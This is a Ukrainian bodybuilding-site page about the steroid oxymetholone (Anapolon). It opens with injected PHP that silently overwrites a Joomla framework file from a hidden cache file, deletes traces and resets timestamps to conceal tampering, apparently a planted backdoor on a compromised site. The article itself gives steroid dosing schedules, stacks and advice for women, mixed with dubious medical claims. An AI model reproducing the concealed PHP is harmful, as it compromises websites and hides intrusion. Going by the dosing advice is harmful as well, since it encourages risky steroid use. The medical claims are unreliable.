$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Анаполон | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Анаполон

АнаполонНа сьогоднішній день Оксіметолон є найдієвішим оральним стероїдом з усіх наявних у продажу.

Хімічна речовина Оксіметолон з'явилася на ринку в 1960 завдяки фірмі Синтекс. До початку 90-х цей препарат випускався в багатьох країнах різними фірмами виробниками і був вільно доступним. Єдині, які залишилися в Європі на сьогоднішній день оригінальні фабричні препарати це: Іранський Оксіметолон Альхаві і Турецький Анаполон.

Оксіметолон - сильний й ефективний оральний стероїд. Препарат має виключно сильну андрогенну дію і є дуже інтенсивним анаболіком. Тому за його допомогою в найкоротший час досягаються величезні прирости сили і м'язової маси. Не рідкість приріст ваги в 5-7 кг і більше протягом всього 14 днів. При цьому відбувається часткове підвищене накопичення води в організмі, що швидко збільшує м'язовий об'єм і за рекордний час надає тим, хто вживає цей препарат, масивний вигляд. Оскільки м'язова клітина притягує до себе дуже багато води, то загальна мускулатура набуває у більшості атлетів гладкий, надутий вигляд. Андролік 50 не забезпечує якісного приросту м'язів, а тільки кількісний, який бажаний в OFF-сезоні. Оксіметолон "змащує" суглоби, оскільки там накопичується вода, що є не малозначним чинником для величезного приросту сили і полегшує атлетам тренування, що страждають на хвороби суглобів.

Штангісти більш високих вагових категорій моляться на Оксіметалон. Завдяки дисциплінованості у харчуванні та одночасному прийому Нольвадекса і Провірона скупчення води можна помітно звести до мінімуму, при солідному прирості мускулатури. За допомогою Оксіметолона атлет отримує під час тренування неабиякий ефект збільшення задіяної групи м'язів. В організмі спостерігається значне підвищення об'єму крові, що веде під час тренування, до посиленого припливу крові до м'язів.

Оксіметолон збільшує кількість еритроцитів у крові, завдяки чому м'язи краще забезпечуються киснем. Підвищується витривалість і продуктивність м'язів. Навіть після кількох підходів атлет має у своєму розпорядженні гарний запас сили. Часто "ефект насоса" приносить атлетові під час тренування фантастичне відчуття задоволення. Сильна андрогенна дія Оксіметалона сприяє дуже високій тілесній регенерації, тому при прийомі препарату перетренованість просто неможлива. Часто після напруженого тренування, у атлета виникає відчуття, що він ще зміг би потренуватися кілька годин, і це при тому, що атлети зазвичай тренуються 6-7 разів на тиждень. Атлет сам наочно бачить свій прогрес.

Хоча Оксіметолон не є стероїдом для підготовки до змагань, він, як ніякий інший препарат допомагає під час дієти зберегти м'язову масу і забезпечити інтенсивні тренування. Багато спортсменів використовують його аж до останнього тижня перед змаганнями, а проблеми накопичення води в організмі, вирішують за допомогою антиестрогенами і зневоднювачами, завдяки чому вони з'являються на сцені масивними і підтягнутими. Що стосується дозування, то тут думки розходяться. Фірма-виробник колишнього іспанського "Оксітозона 50" Сінтект Латино, радить приймати від 1 до 5 мг на 1кг ваги в день. Виходить, що спортсмен вагою в 100 кг повинен приймати, керуючись даними приписами, до 500 мг препарату щоденно, тобто 10 таблеток в день, що зовсім нереально, тому що дані надмірно перебільшені і можуть спричинити сильні побічні явища. Розумна доза для атлета лежить десь у 1мг на 1 кг ваги в день. Це відповідає 1-4 таблеткам (50-200мг) на день. Дози, що перевищують 4 таблетки не слід приймати ні в якому разі, тому що ми вважаємо, що і 3 табл. в день вже складають максимальну добову дозу.

Хто хоче розпочати застосування препарату, має почати лише з однієї 50-ти міліграмової таблетки на день. Через кілька днів, а ще краще-через тиждень, щоденна доза може бути збільшена вдвічі, та вживається вранці та ввечері під час їжі. Атлети, які вже далеко просунулися або важать понад 100 кг, можуть на третьому тижні довести цю дозу до 150мг на день. Але все ж таки дозування не повинне практикуватися більше двох, трьох тижнів, тому що відбувається дуже швидке насичення рецепторів. Прийом препарату взагалі не повинен перевищувати 6-й тижнів.

Часто на початку курсу Оксіметолону виникає величезний приріст маси, який швидко випаровується. Тому тут існує два виходи: або підвищення дозування, чого повинен уникати спортсмен по причині підвищеного ризику побічних явищ; або, що краще, перейти на інший препарат. Хто приймає Оксіметолон 4-6 тижнів може додати у вазі 10кг. Це хороший прогноз для будь-якого атлета, що може служити сигналом для припинення застосування препарату. Правдою було те, що в міру закінчення прийому Оксіметалону стероїдний курс триває із застосуванням іншого препарату, інакше спортсмен, що часто спостеріється, протягом найкоротшого терміну може втратити більшість досягнутих результатів. Жоден інший анаболічний / андрогенний стероїд не тягне за собою такого швидкого різкого падіння м'язової маси і сили.

Відомий важкоатлет одного разу сказав: "Якщо після припинення прийому препарату ти зробиш три підходи, ти будеш важити рівно на 5кг менше і вижмешь на 10кг менше". Тому далекоглядні атлети продовжують "курс" ще кілька тижнів, застосовуючи ін'єкційний тестостерон, типу сустанон 250 або Тестостерон.

Для нарощування м'язової маси і сили атлети дуже часто комбінують Оксіметолон з сустаноном чи з тестостероном. Одне з ефективних сполучень, обожнюваних професіоналами – це Оксіметалон 100мг в день і Параболан 152-228мг на тиждень, а також сустанон в дозі 500мг на тиждень. Це поєднання упаковує м'язову масу і силу, як ніяке інше. Оксіметолон - стероїд не для новачків, і може бути введений тільки тоді, коли атлет досягнув певного рівня розвитку, а також, коли ним накопичено певний досвід застосування "більш легких" стероїдних препаратів. Андролік 50 є, на жаль, і одним з найшкідливіших оральних стероїдів, який викликає цілий ряд побічних явищ. Оскільки він алькулірований (17 альфа), то він є токсичний для печінки. Виникають порушення функцій печінки, які спочатку проявляються в підвищеному коефіцієнті діяльності печінки, але пізніше, особливо при надміру високому і тривалому дозуванні препарату, закінчуються ушкодженнями печінки. Першими ознаками можливого пошкодження печінки є пожовтіння нігтів пальців рук і очей, а також пожовтіння шкіри. Оксіметолон - єдиний стероїд, який підозрюють у виникненні раку печінки. Хімічна речовина оксіметолон з легкістю перетворюється на естрогени, тому часті явища фемінізації і акумуляції води в організмі, що вимагає прийому антиестрогенів (напр. Нольвадекса і Провірон). Сильне скупчення води загрожує для деяких і тим, що може привести до підвищення тиску в кровоносній системі. Це в екстремальних випадках тягне за собою необхідність прийому антігіпертоніка, напр. Катапрезана. Оскільки частина хімічної речовини може перетворюватися і в Дигідротестостерон, можливі сильні акне і посилене випадання волосся. Можуть виникнути й такі побічні явища як головні болі, нудота, блювота, біль у шлунку, сонливість і проноси. У атлета може виникнути відчуття загального нездужання, на відміну від препарату Діанабол, який є препаратом хорошого емоційного стану. Часто виникає парадоксальна ситуація: з одного боку атлет стає все сильнішим і масивнішим, з іншого - не дуже добре себе почуває, такі явища індивідуальні! Посилена агресивність при високому рівні андрогенів проявляється тоді, коли одночасно вводяться великі дози Тестостерону.

Оксіметолон - не підходить для літніх атлетів, тому що вони більш схильні до різних побічних явищ. До того ж у них особливо висока небезпека ушкоджень печінки і карциноми простати. У поєднанні зі звичною - для нарощування м'язової маси висококалорійної і, на жаль, часто багатої жирами дієтою може призвести до підвищення рівня холестерину в крові, до підвищення коефіцієнта LDL і зниження коефіцієнта HDL. Виробництво власного тестостерону сильно скорочується, тому що Оксіметолон надає гальмуючий вплив на гіпоталамус мозку, що скорочує або повністю припиняє виділення гонадотропного гормону. Отже, неодмінно необхідно приймати стимулятори вироблення тестостерону, такі як HCG і Дінерік, щоб зберегти на рівні вироблення гормону в яєчках. На початку прийому Оксіметалона деякі атлети помічають сильно збільшений сексуальний інтерес, який вже через пару тижнів спадає.

Жінкам приймати Оксіметолон, ми не радимо. Оскільки він викликає сильні і частково незворотні явища маскулінізації: акне, гіпертрофію клітора, зниження тембру голосу, посилений ріст волосся на ногах, обличчі, підвищене лібідо, випадання волосся на голові і ассоціальну поведінку. Оксіметалон просто занадто сильний для жіночого організму. Та все ж деякі учасниці національних та інтернаціональних змагань приймають цей препарат і досягають величезних успіхів. Жінки, які не хочуть відмовлятися від неймовірних результатів Оксіметолона, але одночасно бажаючі знизити, наскільки це можливо, його всілякі, обумовлені його андрогенним характером, побічні явища, можуть обережно почати його застосування по 25 мг на день. Застосовуючи Оксіметолон за схемою 2-4 дні прийом, 2-4 дні перерва і комбінуючи його з яким-небудь "м'яким", головним чином, анаболічним ін'єкційним стероїдом, з такими, як Прімоболан, дураболін. Внаслідок всіляких шкідливих впливів (Оксіметолона) необхідний періодичний контроль стану печінки. У деяких пацієнтів виникає дефіцит заліза в крові. Тут рекомендується постійний біохімічний контроль складу крові на предмет заліза в ній. В разі його нестачі цей елемент повинен дуже обережно використовуватися пацієнтами із захворюванням серця, печінки та нирок. У разі набряків дане лікування поєднується із застосуванням діуретиків і/або мануальної терапії. При появі гіперкальціємії, лікування повинно бути припинене. Анаболічні стероїди можуть змінити рівень цукру в крові. Тому хворі на діабет повинні перебувати під суворим лікарським контролем. Лікування пацієнтів із захворюванням простати і гіпертрофією повинно проводитися дуже обережно. Цей медикамент може змінити баланс холестерину в організмі. Його з обережністю потрібно застосовувати у хворих з венеричними захворюваннями, які перенесли інфаркт міокарда, захворюваннями коронарних артерій. Терапія повинна відповідати балансу холестерину. У вкрай рідкісних випадках тривале застосування препарату може призвести до серйозних пошкоджень печінки і теоретично може призвести навіть до смерті пацієнта, що є в принципі дуже мало ймовірним. Існує підозра, що тривале лікування цим препаратом може навіть викликати рак печінки, лейкемію, явище маскулінізації у жінок, пелозіс печінки. Ці ліки містять лактозу. Бувають випадки несприємливість його дітьми і підлітками. Незначний вміст лактози, ймовірно, не є причиною такої несприємливості. У випадки проносів слід звернутися до лікаря. Анаболічні стероїди можуть підвищити чутливість до препаратів, спрямованих на зниження здатності згущування крові. У цьому випадку зменшується їх дозування. Іноді спостерігаються випадки жовтяниці, підвищеного вмісту біллірубіна в крові, алкалінфосфата і трансомінази. Ці показники нормалізуються при припиненні лікування омепразолом. У чоловіків спостерігалися випадки зниження тестикулярної функції. У жінок можуть проявитися чисто чоловічі ознаки: низький грубий голос, зміни лібідо і порушення менструального циклу. Наступними побічними проявами анаболічної терапії є проноси, сонливість, судоми, нудота, дратівливість і підвищена збудливість, озноб.
 
Статті СТЕРОЇДИ Анаполон